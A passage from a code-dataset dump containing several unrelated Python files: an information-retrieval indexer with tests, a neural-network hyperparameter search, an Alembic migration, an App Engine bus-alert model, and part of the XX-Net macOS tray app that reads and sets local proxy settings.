{}'.format(len(y_trues), y_trues.count(0), y_trues.count(1)))\n print('Accuracy: %f -- Precision: %f -- +Recall: %f -- F1: %f ' % (acc, prc, rc, f1))\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_trues, y_preds).ravel()\n recall_p = tp / (tp + fn)\n recall_n = tn / (tn + fp)\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(auc_, recall_p, recall_n))\n # return , auc_\n\n # print('AP: {}'.format(average_precision_score(y_trues, y_pred_probs)))\n # return recall_p, recall_n, acc, prc, rc, f1, auc_\n return acc, prc, rc, f1, auc_, recall_p, recall_n\n\ndef rightness(predictions, labels):\n \"\"\"计算预测错误率的函数,其中predictions是模型给出的一组预测结果,batch_size行num_classes列的矩阵,labels是数据之中的正确答案\"\"\"\n pred = torch.max(predictions.data, 1)[1] # 对于任意一行(一个样本)的输出值的第1个维度,求最大,得到每一行的最大元素的下标\n rights = pred.eq(labels.data.view_as(pred)).sum() #将下标与labels中包含的类别进行比较,并累计得到比较正确的数量\n return rights, len(labels) 
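# --- Illustrative aside (hedged sketch) ---
# sentence2vec() above returns a dictionary-sized vector of word frequencies
# normalised by sentence length. A tiny worked example, with integer indices
# standing in for the word2index() mapping used by loaddata():
import numpy as np

def sentence2vec(sentence, dictionary):
    vector = np.zeros(len(dictionary))
    for token in sentence:
        vector[token] += 1
    return 1.0 * vector / len(sentence)

vec = sentence2vec([0, 2, 2, 1], {'a': 0, 'b': 1, 'c': 2})
assert np.allclose(vec, [0.25, 0.25, 0.5])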
#返回正确的数量和这一次一共比较了多少元素","sub_path":"learn/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277581555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 19 09:48:37 2020\n\n@author: Ihab\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Deflection as d\nimport Parameters as c\n\n#%%\n\ndef torsion_shear(xloc):\n A1 = 1/2*np.pi*((c.h/2)**2)\n A2 = 1/2*c.h*(c.Ca-c.h/2)\n\n l2 = np.pi * c.h/2\n\n T = d.T_span(xloc)[0]\n c1 = 1/(2*A1*c.G)*(l2/c.tsk + c.h/c.tsp) + 1/(2*A2*c.G)*(c.h/c.tsp)\n c2 = -(1/(2*A1*c.G)*c.h/c.tsp + 1/(2*A2*c.G)*(2*c.lsk/c.tsk + c.h/c.tsp))\n c3 = -1/(2*A1*c.G)*(l2/c.tsk + c.h/c.tsp)\n c4 = 1/(2*A1*c.G)*c.h/c.tsp\n\n # c11 = 1/(2*A1)*(l2/tsk + l1/tsp)\n # c12 = -1/(2*A1)*l1/tsp\n # c21 = -l1/tsp*1/(2*A2)\n # c22 = 1/A2*l3/tsk + l1/tsp*1/(2*A2)\n\n\n mat = np.array([[2*A1, 2*A2, 0], [c1, c2, 0], [c3, c4, 1]])\n sol = np.array([[T],[0],[0]])\n\n# mat = np.array([[c11, c12, -1], [c21, c22, -1],[2*A1, 2*A2, 0]])\n# sol = np.array([[0],[0],[T]])\n\n ans = np.matmul(np.linalg.inv(mat), sol)\n# ans = np.linalg.solve(mat,sol)\n\n J = T/(c.G*ans[2])\n \n return ans[0],ans[1],J\n\n# def torsion_const():\n# return torsion_shear(0.5)[2]\n\n\n\n","sub_path":"Validation/TorsionShear.py","file_name":"TorsionShear.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55332772","text":"#!/usr/local/bin/python3\nfrom string import punctuation\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem.porter import *\nfrom nltk.corpus import stopwords\nfrom os import listdir\nfrom sys import argv\nfrom math import ceil\nfrom math import log10\nimport json\n\nREMOVE_STOPWORDS = False\n\n'''\nbinary search to find index of docid in list\nreturns tuple (True/False, index)\n'''\ndef bin_search(docid, lst):\n lo = 0\n hi = len(lst) - 1\n while(lo <= hi):\n mid = ceil((hi + lo) / 2)\n if (lst[mid][0] > docid):\n hi = mid - 1\n elif (lst[mid][0] < docid):\n lo = mid + 1\n else:\n return (True, mid)\n mid = ceil((hi + lo) / 2)\n return (False, mid)\n\n\n'''\nGenerates the posting lists with df and tf for each word with stemming and tokenization\n'''\ndef generate_posting_list(directory):\n DOC_COUNT = 0\n # translator for removing punctuation\n punct_translator = str.maketrans('', '', punctuation)\n\n # store stopwords as a set for fast lookup\n stopwords_set = set(stopwords.words('english'))\n\n # using porter stemmer\n stemmer = PorterStemmer()\n index = {}\n doclen = {}\n for f in sorted(listdir(directory), key=lambda x: int(x.split(\"_\")[1])):\n DOC_COUNT += 1\n docid = int(f.split(\"_\")[1])\n doc = open(directory + \"/\" +f, \"r\")\n\n docText = [w.lower() for w in doc][0].translate(punct_translator)\n docText = [stemmer.stem(w.lower()) for w in word_tokenize(docText)]\n\n # if you don't like data structures turn away\n\n pos = 0\n for word in docText:\n if word in stopwords_set and REMOVE_STOPWORDS:\n pos += 1\n continue\n if word not in index:\n index[word] = {'df':1, 'postings':[(docid,{'tf':1, 'tf-idf':0, 'pos':[pos]})]}\n else:\n doc_index = bin_search(docid, index[word]['postings'])\n # docid in posting list\n if doc_index[0]:\n index[word]['postings'][doc_index[1]][1]['pos'].append(pos)\n index[word]['postings'][doc_index[1]][1]['tf'] += 1\n # docid not in posting list\n else:\n index[word]['postings'].insert(doc_index[1], (docid, 
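# --- Illustrative aside (hedged sketch) ---
# bin_search() above returns (found, index), where index is the insertion
# point when the docid is absent -- the contract of bisect.bisect_left applied
# to the first tuple element. An equivalent formulation:
from bisect import bisect_left

def bin_search_via_bisect(docid, lst):
    keys = [item[0] for item in lst]
    i = bisect_left(keys, docid)
    return (i < len(keys) and keys[i] == docid, i)

assert bin_search_via_bisect(10, [(1, {}), (10, {}), (15, {})]) == (True, 1)
assert bin_search_via_bisect(12, [(1, {}), (10, {}), (15, {})]) == (False, 2)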
{'tf':1,'tf-idf':0, 'pos':[pos]}))\n index[word]['df'] += 1\n pos += 1\n\n doclen[docid] = pos\n\n # Now calculate the tf-idf and update it for every entry in the index\n # This doesnt have a unit test as it is just a math formula, and we would just be testing for order of operations.\n for term in index.keys():\n for docid_index in range(len(index[term]['postings'])):\n index[term]['postings'][docid_index][1]['tf-idf'] = float((1 + log10(index[term]['postings'][docid_index][1]['tf'])) * log10(DOC_COUNT/int(index[term]['df'])))\n\n return (index, DOC_COUNT, doclen)\n\nif __name__ == \"__main__\":\n INDEX_FILENAME = \"index.json\"\n\n # ensure proper calling format\n if len(argv) != 2:\n raise SyntaxError(\"Expected usage ./create_index.py [dir]\")\n\n directory = argv[1]\n \n index = generate_posting_list(directory)\n\n index_file = open(INDEX_FILENAME, 'w')\n index_file.write(json.dumps(index, indent=4))\n\n#---------------UNIT TESTS-----------------\n\n#Tests if our binary search for inserting into the index is working properly\ndef test_bin_search():\n l = [(1, {}), (3, {}), (4, {}), (6, {}), (8, {}), (9, {}), (10, {}), (11, {}), (13, {}), (15, {}), (19, {}), (35, {}), (56, {}), (192, {}), (500, {})]\n assert(bin_search(1, l) == (True, 0))\n assert(bin_search(500, l) == (True, 14))\n assert(bin_search(10, l) == (True, 6))\n assert(bin_search(12, l) == (False, 8))\n\n l = [(1, {})]\n assert(bin_search(1, l) == (True, 0))\n assert(bin_search(2, l) == (False, 1))\n assert(bin_search(0, l) == (False, 0))\n\n l = []\n assert(bin_search(1, l) == (False, 0))\n\t\n#Testing if our lambda function to sort the docs in the corpus works properly\ndef test_lambda_sort():\n l = [\"doc_132_yep\", \"doc_6_Nope\", \"doc_130_helpme\", \"doc_1_plz\"]\n f = sorted(l, key = lambda x: int(x.split(\"_\")[1]))\n assert(f == [\"doc_1_plz\", \"doc_6_Nope\", \"doc_130_helpme\", \"doc_132_yep\"])\n \n#Testing translator for the removal of punctuation\ndef test_punct_remove():\n punct_translator = str.maketrans('', '', punctuation)\n sentence = \"Hello. My name, is! 
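# --- Illustrative aside (hedged sketch) ---
# The weight filled in above is the classic log-scaled tf-idf,
# (1 + log10(tf)) * log10(N / df). Restated with a spot check:
# tf=10, df=1, N=100 gives (1 + 1) * 2 = 4.
from math import log10

def tf_idf(tf, df, n_docs):
    return (1 + log10(tf)) * log10(n_docs / df)

assert abs(tf_idf(10, 1, 100) - 4.0) < 1e-9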
not 'this': I don't think; at least.!?\"\n ts = sentence.translate(punct_translator)\n assert(ts == \"Hello My name is not this I dont think at least\")\n","sub_path":"Assignment_1/create_index.py","file_name":"create_index.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646051745","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 18:02:01 2020\n\n@author: gracehymas\n\n\"\"\"\n\nimport sys\nsys.path.append(\"../\")\nsys.path.append(\"../dataset-and-plotting\")\n\nimport pandas as pd\nimport numpy as np\n\nimport pandas as pd\nimport keras\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom sklearn.preprocessing import scale\n\nfrom nnPlotting import *\n\nfrom hyperopt.pyll import scope\nfrom hyperopt import hp, fmin, tpe, Trials, STATUS_OK, rand\n\n\ndef totalSensitivity(A,B,errorA,errorB):\n totalSensitivity = np.sqrt(A**2 + B**2)\n totalError = np.sqrt(((A*errorA)/np.sqrt(A**2 + B**2))**2 + ((B*errorB)/np.sqrt(A**2 + B**2))**2)\n\n return (totalSensitivity,totalError)\n\nfor nJets in [2,3]:\n\n if nJets == 2:\n variables = ['dRBB','mBB','pTB1', 'pTB2', 'MET','dPhiVBB','dPhiLBmin','Mtop','dYWH', 'mTW', 'pTV', 'MV1cB1_cont', 'MV1cB2_cont', 'nTags', 'nTrackJetsOR']\n\n else:\n variables = ['mBB', 'dRBB', 'pTB1', 'pTB2', 'MET', 'dPhiVBB', 'dPhiLBmin', 'Mtop', 'dYWH', 'mTW', 'pTV', 'mBBJ', 'pTJ3', 'MV1cB1_cont', 'MV1cB2_cont', 'MV1cJ3_cont', 'nTags', 'nTrackJetsOR']\n\n # Read in Data\n if nJets == 2:\n dfEven = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_2jet_even.csv')\n dfOdd = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_2jet_odd.csv')\n\n else:\n dfEven = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_3jet_even.csv')\n dfOdd = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_3jet_odd.csv')\n \n # Process Even Events\n xEven = scale(dfEven[variables].to_numpy())\n yEven = dfEven['Class'].to_numpy()\n wEven = dfEven['training_weight'].to_numpy()\n\n # Process Odd Events\n xOdd = scale(dfOdd[variables].to_numpy())\n yOdd = dfOdd['Class'].to_numpy()\n wOdd = dfOdd['training_weight'].to_numpy()\n\n # Dictionary of hyperparameters of BDT and possible range of values\n \n hyperparameters = {'epochs': hp.quniform('epochs', 100, 300, 10),\n 'batch_size': hp.quniform(\"batch_size\", 50, 200, 1),\n }\n \n \n \n def DNNClassifier():\n\n model = Sequential()\n\n # Add Layers\n model.add(Dense(units=14, input_shape=(xEven.shape[1],), activation='relu')) # 1st layer\n model.add(Dense(14, init='uniform', activation='relu')) # hidden layer\n model.add(Dense(14, init='uniform', activation='relu')) # hidden layer\n model.add(Dense(1, activation='sigmoid')) # output layer\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n \n # Objective function to be minimised \n def objective_function(hyperparameters):\n modelEven = DNNClassifier()\n \n modelOdd = DNNClassifier()\n \n # Train Model\n modelEven.fit(xEven,\n yEven, \n sample_weight = wEven, \n epochs = int(hyperparameters['epochs']), \n batch_size=int(hyperparameters['batch_size']), \n verbose = 0)\n \n modelOdd.fit(xOdd,\n yOdd, \n sample_weight = wOdd, \n epochs = int(hyperparameters['epochs']), \n batch_size=int(hyperparameters['batch_size']), \n verbose = 0)\n \n ## EVALUATION DNN & Plots\n dfOdd['decision_value'] = modelEven.predict_proba(xOdd)\n dfEven['decision_value'] = modelOdd.predict_proba(xEven)\n df = 
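# --- Illustrative aside (hedged sketch) ---
# The optimisation script above wraps a Keras objective in hyperopt's fmin.
# The same API on a toy quadratic, assuming hyperopt is installed; the
# parameter name 'x' and its search bounds are illustrative.
from hyperopt import STATUS_OK, fmin, hp, rand

space = {'x': hp.uniform('x', -5, 5)}

def objective(params):
    return {'loss': (params['x'] - 2) ** 2, 'status': STATUS_OK}

best = fmin(fn=objective, space=space, algo=rand.suggest, max_evals=50)
print(best)  # best['x'] should land near 2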
pd.concat([dfOdd,dfEven])\n \n sensitivity = calc_sensitivity_with_error(df)\n \n # We wish to maximise sensitivity therefore minimise -1*sensitivity \n return {'loss': -1*sensitivity[0], 'status': STATUS_OK}\n\n trials = Trials()\n\n # This function does the optimisation using the objective function and the hyperparameters given\n best = fmin(\n fn=objective_function,\n space=hyperparameters,\n algo=rand.suggest, # Random search/ stochastic\n max_evals=50 # The number of iterations\n )\n\n print(best)\n \n \n","sub_path":"DeepNeuralNetworks/NNOptimisation.py","file_name":"NNOptimisation.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"637464117","text":"\"\"\"ortschaften\n\nRevision ID: 615daca391cd\nRevises: 3ebbb289aa33\nCreate Date: 2020-06-01 23:57:09.422643\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '615daca391cd'\ndown_revision = '3ebbb289aa33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('ortschaften',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ort', sa.String(length=200), nullable=True),\n sa.Column('laenge', sa.Float(), nullable=True),\n sa.Column('breite', sa.Float(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('ortschaften')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/615daca391cd_ortschaften.py","file_name":"615daca391cd_ortschaften.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125118273","text":"from google.appengine.api import users, mail\nfrom google.appengine.ext import db\nfrom buscall.models import nextbus\nfrom buscall.models.nextbus import get_agency, get_route,get_predictions, get_route\nfrom buscall.models.profile import UserProfile\nfrom buscall.util import DAYS_OF_WEEK, MAIL_SENDER\nfrom buscall.models.twilio import notify_by_phone, notify_by_txt\nfrom buscall.decorators import check_user_payment\nfrom buscall.util import humanize_list\nimport datetime\ntry:\n from itertools import compress\nexcept ImportError:\n from itertools import izip\n def compress(data, selectors):\n return (d for d, s in izip(data, selectors) if s)\n\nNOTIFICATION_CHOICES = (('phone', 'Call'), ('txt', 'Text'), ('email', 'Email'))\n\nclass BusListener(db.Model):\n userprofile = db.ReferenceProperty(UserProfile, collection_name=\"listeners\", required=True)\n\n # info about bus stop\n agency_id = db.StringProperty(required=True, default=\"mbta\")\n route_id = db.StringProperty(required=True)\n direction_id = db.StringProperty(required=False)\n stop_id = db.StringProperty(required=True)\n\n # is this a one-time alert, or a recurring alert?\n recur = db.BooleanProperty(required=True)\n\n # when to start listening\n # App Engine doesn't allow inequality filters on multiple entities\n # (such as time is after start and time is before end)\n # so instead we'll use a boolean to determine whether this needs to be checked\n start = db.TimeProperty(required=True)\n # when all your notifications have been satisfied, set seen=True\n seen = db.BooleanProperty(required=True, default=False)\n\n # day of week: since we'll be sorting by this,\n # it 
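# --- Illustrative aside (hedged sketch) ---
# listener.py above falls back to an izip-based compress() on interpreters
# without itertools.compress. Both versions keep exactly the data items whose
# selector is truthy:
from itertools import compress

days = ['mon', 'tue', 'wed']
flags = [True, False, True]
assert list(compress(days, flags)) == ['mon', 'wed']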
actually makes sense to keep them as separate properties\n mon = db.BooleanProperty(required=True, default=True)\n tue = db.BooleanProperty(required=True, default=True)\n wed = db.BooleanProperty(required=True, default=True)\n thu = db.BooleanProperty(required=True, default=True)\n fri = db.BooleanProperty(required=True, default=True)\n sat = db.BooleanProperty(required=True, default=True)\n sun = db.BooleanProperty(required=True, default=True)\n\n @property\n def daily(self):\n return all((getattr(self, d) for d in DAYS_OF_WEEK))\n\n @property\n def weekdays(self):\n return self.mon and self.tue and self.wed and self.thu and self.fri \\\n and not self.sat and not self.sun\n\n @property\n def weekends(self):\n return self.sat and self.sun \\\n and not self.mon and not self.tue and not self.wed and not self.thu and not self.fri\n\n @property\n def repeat_descriptor(self):\n if self.recur:\n if self.daily:\n return \"every day\"\n if self.weekdays:\n return \"every weekday\"\n if self.weekends:\n return \"every weekend\"\n \n day_names = [day.capitalize() for day in DAYS_OF_WEEK]\n day_vals = [getattr(self, day) for day in DAYS_OF_WEEK]\n if not any(day_vals):\n return \"never\" # should never get here\n return \"every %s\" % (humanize_list(compress(day_names, day_vals)),)\n \n else:\n today = datetime.date.today()\n tomorrow = today + datetime.timedelta(days=1)\n for i, day in enumerate(DAYS_OF_WEEK):\n if getattr(self, day):\n if i == today.weekday():\n return \"today\"\n if i == tomorrow.weekday():\n return \"tomorrow\"\n return \"on %s\" % (day.capitalize())\n return \"never\" # should never get here\n \n @property\n def agency(self):\n return nextbus.get_agency(self.agency_id)\n \n @property\n def route(self):\n if not getattr(self, \"_route\", None):\n self._route = nextbus.get_route(self.agency_id, self.route_id)\n return self._route\n \n @property\n def direction(self):\n if not getattr(self, \"_direction\", None):\n self._direction = nextbus.get_direction(self.agency_id, self.route_id, self.direction_id)\n return self._direction\n \n @property\n def stop(self):\n if not getattr(self, \"_stop\", None):\n self._stop = nextbus.get_stop(self.agency_id, self.route_id, self.direction_id, self.stop_id)\n return self._stop\n \n @property\n def id(self):\n return self.key().id()\n \n def __str__(self):\n values = {}\n for prop in self.properties().keys():\n values[prop] = getattr(self, prop, None)\n for time in [u'start']:\n try:\n values[time] = values[time].time()\n except AttributeError:\n pass\n values[u'class'] = self.__class__.__name__\n values[u'user'] = self.userprofile.user\n values[u'repeat'] = self.repeat_descriptor\n return \"%(class)s for %(user)s: %(agency_id)s %(route_id)s \" \\\n \"%(direction_id)s %(stop_id)s %(start)s %(repeat)s\" \\\n % values\n \n def get_predictions(self):\n \"Use the Nextbus API to get route prediction information.\"\n return nextbus.get_predictions(self.agency_id, self.route_id, self.direction_id, self.stop_id)\n \n def check_notifications(self):\n self.seen = all((notification.executed for notification in self.notifications))\n if self.seen and not self.recur:\n self.delete()\n else:\n self.put()\n \n def delete(self):\n # delete all your associated notifications first\n for notification in self.notifications:\n notification.delete()\n # and then delete yourself\n super(BusListener, self).delete()\n\nclass BusNotification(db.Model):\n listener = db.ReferenceProperty(BusListener, collection_name=\"notifications\", required=True)\n minutes = 
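# --- Illustrative aside (hedged sketch) ---
# repeat_descriptor above folds the seven per-day booleans into "every day",
# "every weekday", or "every weekend". The same classification over a plain
# dict, with humanize_list and the custom-day branch left out:
WEEKDAYS = ('mon', 'tue', 'wed', 'thu', 'fri')
WEEKEND = ('sat', 'sun')

def describe(days):
    if all(days.values()):
        return 'every day'
    if all(days[d] for d in WEEKDAYS) and not any(days[d] for d in WEEKEND):
        return 'every weekday'
    if all(days[d] for d in WEEKEND) and not any(days[d] for d in WEEKDAYS):
        return 'every weekend'
    return 'custom'

assert describe(dict.fromkeys(WEEKDAYS + WEEKEND, True)) == 'every day'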
db.IntegerProperty(required=True)\n medium = db.StringProperty(choices=[k for k,v in NOTIFICATION_CHOICES], required=True)\n executed = db.BooleanProperty(required=True, default=False)\n\n def __str__(self):\n if self.executed:\n status = \"executed\"\n else:\n status = \"not executed\"\n return \"%s for <%s>, %d minutes before via %s, %s\" % \\\n (self.__class__.__name__, self.listener, self.minutes, self.medium, status)\n\n def execute(self, minutes=None):\n \"minutes parameter is the actual prediction time\"\n userprofile = self.listener.userprofile\n if not userprofile.subscribed and userprofile.credits < 1:\n # no money, no notification\n return\n\n if minutes is None:\n minutes = self.minutes\n\n if self.medium == \"email\":\n notify_by_email(self.listener, minutes)\n elif self.medium == \"phone\":\n notify_by_phone(self.listener, minutes)\n elif self.medium == \"txt\":\n notify_by_txt(self.listener, minutes)\n else:\n raise NotImplementedError\n \n self.executed = True\n self.put()\n self.listener.check_notifications()\n\n@check_user_payment\ndef notify_by_email(listener, minutes=None):\n if minutes is None:\n predictions = listener.get_predictions()\n minutes = predictions.buses[0].minutes\n subject = \"ALERT: %s bus, %s\" % (listener.route.title, listener.stop.title)\n body = \"Your bus is coming in %d minutes.\" % (minutes)\n mail.send_mail(sender=MAIL_SENDER,\n to=listener.userprofile.email,\n subject=subject, body=body)\n","sub_path":"buscall/models/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":7546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88515542","text":"#!/usr/bin/env python\n# coding:utf-8\n\nimport os\nimport sys\n\n# current_path = os.path.dirname(os.path.abspath(__file__))\ncurrent_path = os.path.abspath(\"/Users/he/proj/XX-Net/code/default/launcher\")\n# helper_path = os.path.join(current_path, os.pardir, os.pardir, os.pardir, 'data', 'launcher', 'helper')\n\nif __name__ == \"__main__\":\n python_path = os.path.abspath(os.path.join(current_path, os.pardir, 'python27', '1.0'))\n noarch_lib = os.path.abspath(os.path.join(python_path, 'lib', 'noarch'))\n sys.path.append(noarch_lib)\n osx_lib = os.path.join(python_path, 'lib', 'darwin')\n sys.path.append(osx_lib)\n extra_lib = \"/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC\"\n sys.path.append(extra_lib)\n\n# import config\n# import module_init\nimport subprocess\nimport webbrowser\n\n# from xlog import getLogger\n# xlog = getLogger(\"launcher\")\n\nimport AppKit\nimport SystemConfiguration\nfrom PyObjCTools import AppHelper\n\n\nclass MacTrayObject(AppKit.NSObject):\n def __init__(self):\n pass\n\n def applicationDidFinishLaunching_(self, notification):\n # setupHelper()\n # loadConfig()\n self.setupUI()\n self.registerObserver()\n\n def setupUI(self):\n self.statusbar = AppKit.NSStatusBar.systemStatusBar()\n self.statusitem = self.statusbar.statusItemWithLength_(\n AppKit.NSSquareStatusItemLength) # NSSquareStatusItemLength #NSVariableStatusItemLength\n\n # Set initial image icon\n icon_path = os.path.join(current_path, \"web_ui\", \"favicon-mac.ico\")\n image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))\n image.setScalesWhenResized_(True)\n image.setSize_((15, 15))\n self.statusitem.setImage_(image)\n\n # Let it highlight upon clicking\n self.statusitem.setHighlightMode_(1)\n self.statusitem.setToolTip_(\"XX-Net\")\n\n # Get current selected mode\n proxyState = 
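# --- Illustrative aside (hedged sketch) ---
# BusNotification.execute() above branches on self.medium with if/elif and
# raises NotImplementedError otherwise. An equivalent dispatch-table shape,
# with hypothetical handler names:
def notify_email(listener, minutes): ...
def notify_phone(listener, minutes): ...
def notify_txt(listener, minutes): ...

HANDLERS = {'email': notify_email, 'phone': notify_phone, 'txt': notify_txt}

def execute(medium, listener, minutes):
    handler = HANDLERS.get(medium)
    if handler is None:
        raise NotImplementedError(medium)
    handler(listener, minutes)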
getProxyState(currentService)\n\n # Build a very simple menu\n self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')\n\n menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')\n # 设置为选中状态\n menuitem.setState_(AppKit.NSOnState)\n # if proxyState == 'disable':\n # menuitem.setState_(AppKit.NSOnState)\n self.menu.addItem_(menuitem)\n # self.disableGaeProxyMenuItem = menuitem\n\n # Default event\n menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')\n self.menu.addItem_(menuitem)\n # Bind it to the status item\n self.statusitem.setMenu_(self.menu)\n\n # Hide dock icon\n AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)\n\n def updateStatusBarMenu(self):\n self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())\n\n # Remove Tick before All Menu Items\n self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)\n self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)\n self.globalXTunnelMenuItem.setState_(AppKit.NSOffState)\n self.globalSmartRouterMenuItem.setState_(AppKit.NSOffState)\n self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)\n\n # Get current selected mode\n proxyState = getProxyState(currentService)\n\n # Update Tick before Menu Item\n if proxyState == 'pac':\n self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'gae':\n self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'x_tunnel':\n self.globalXTunnelMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'smart_router':\n self.globalSmartRouterMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'disable':\n self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)\n\n # Trigger autovalidation\n self.menu.update()\n\n def validateMenuItem_(self, menuItem):\n return currentService or (menuItem != self.autoGaeProxyMenuItem and\n menuItem != self.globalGaeProxyMenuItem and\n menuItem != self.globalXTunnelMenuItem and\n menuItem != self.globalSmartRouterMenuItem and\n menuItem != self.disableGaeProxyMenuItem)\n\n def presentAlert_withTitle_(self, msg, title):\n self.performSelectorOnMainThread_withObject_waitUntilDone_('presentAlertWithInfo:', [title, msg], True)\n return self.alertReturn\n\n def presentAlertWithInfo_(self, info):\n alert = AppKit.NSAlert.alloc().init()\n alert.setMessageText_(info[0])\n alert.setInformativeText_(info[1])\n alert.addButtonWithTitle_(\"OK\")\n alert.addButtonWithTitle_(\"Cancel\")\n self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn\n\n def registerObserver(self):\n nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()\n nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)\n\n def windowWillClose_(self, notification):\n executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])\n services = executeResult.split('\\n')\n services = filter(lambda service: service and service.find('*') == -1 and getProxyState(service) != 'disable',\n services) # Remove disabled services and empty lines\n\n if len(services) > 0:\n print('helperDisableAutoProxy')\n os._exit(0)\n AppKit.NSApp.terminate_(self)\n\n def disableProxy_(self, _):\n print(\"disableProxy_\")\n\n\ndef getCurrentServiceMenuItemTitle():\n if currentService:\n return 'Connection: %s' % currentService\n else:\n return 'Connection: None'\n\n\ndef getProxyState(service):\n if not service:\n return\n\n # Check if auto proxy 
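# --- Illustrative aside (hedged sketch) ---
# getProxyState() below classifies `networksetup` output by matching fixed
# "Enabled/Server/Port" substrings. The web-proxy branch in isolation; the
# port-to-mode mapping mirrors the constants used in this file.
def classify_webproxy(output):
    if 'Enabled: Yes\nServer: 127.0.0.1\nPort: 8087' in output:
        return 'gae'
    if 'Enabled: Yes\nServer: 127.0.0.1\nPort: 1080' in output:
        return 'x_tunnel'
    if 'Enabled: Yes\nServer: 127.0.0.1\nPort: 8086' in output:
        return 'smart_router'
    return 'disable'

assert classify_webproxy('Enabled: Yes\nServer: 127.0.0.1\nPort: 8087\n') == 'gae'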
is enabled\n executeResult = subprocess.check_output(['networksetup', '-getautoproxyurl', service])\n if (executeResult.find('http://127.0.0.1:8086/proxy.pac\\nEnabled: Yes') != -1):\n return \"pac\"\n\n # Check if global proxy is enabled\n executeResult = subprocess.check_output(['networksetup', '-getwebproxy', service])\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 8087') != -1):\n return \"gae\"\n\n # Check if global proxy is enabled\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 1080') != -1):\n return \"x_tunnel\"\n\n if (executeResult.find('Enabled: Yes\\nServer: 127.0.0.1\\nPort: 8086') != -1):\n return \"smart_router\"\n\n return \"disable\"\n\n\n# Generate commands for Apple Script\ndef getEnableAutoProxyCommand(service):\n return \"networksetup -setautoproxyurl \\\\\\\"%s\\\\\\\" \\\\\\\"http://127.0.0.1:8086/proxy.pac\\\\\\\"\" % service\n\n\ndef getDisableAutoProxyCommand(service):\n return \"networksetup -setautoproxystate \\\\\\\"%s\\\\\\\" off\" % service\n\n\nsys_tray = MacTrayObject.alloc().init()\ncurrentService = None\n\n\ndef fetchCurrentService(protocol):\n global currentService\n status = SystemConfiguration.SCDynamicStoreCopyValue(None, \"State:/Network/Global/\" + protocol)\n if not status:\n currentService = None\n return\n serviceID = status['PrimaryService']\n service = SystemConfiguration.SCDynamicStoreCopyValue(None, \"Setup:/Network/Service/\" + serviceID)\n if not service:\n currentService = None\n return\n currentService = service['UserDefinedName']\n\n@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)\ndef networkChanged(center, observer, name, object, userInfo):\n fetchCurrentService('IPv4')\n # loadConfig()\n sys_tray.updateStatusBarMenu()\n\n\n# Note: the following code can't run in class\ndef serve_forever():\n app = AppKit.NSApplication.sharedApplication()\n app.setDelegate_(sys_tray)\n\n # Listen for network change\n nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()\n AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, \"com.apple.system.config.network_change\", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)\n\n # fetchCurrentService('IPv4')\n AppHelper.runEventLoop()\n\n\ndef main():\n 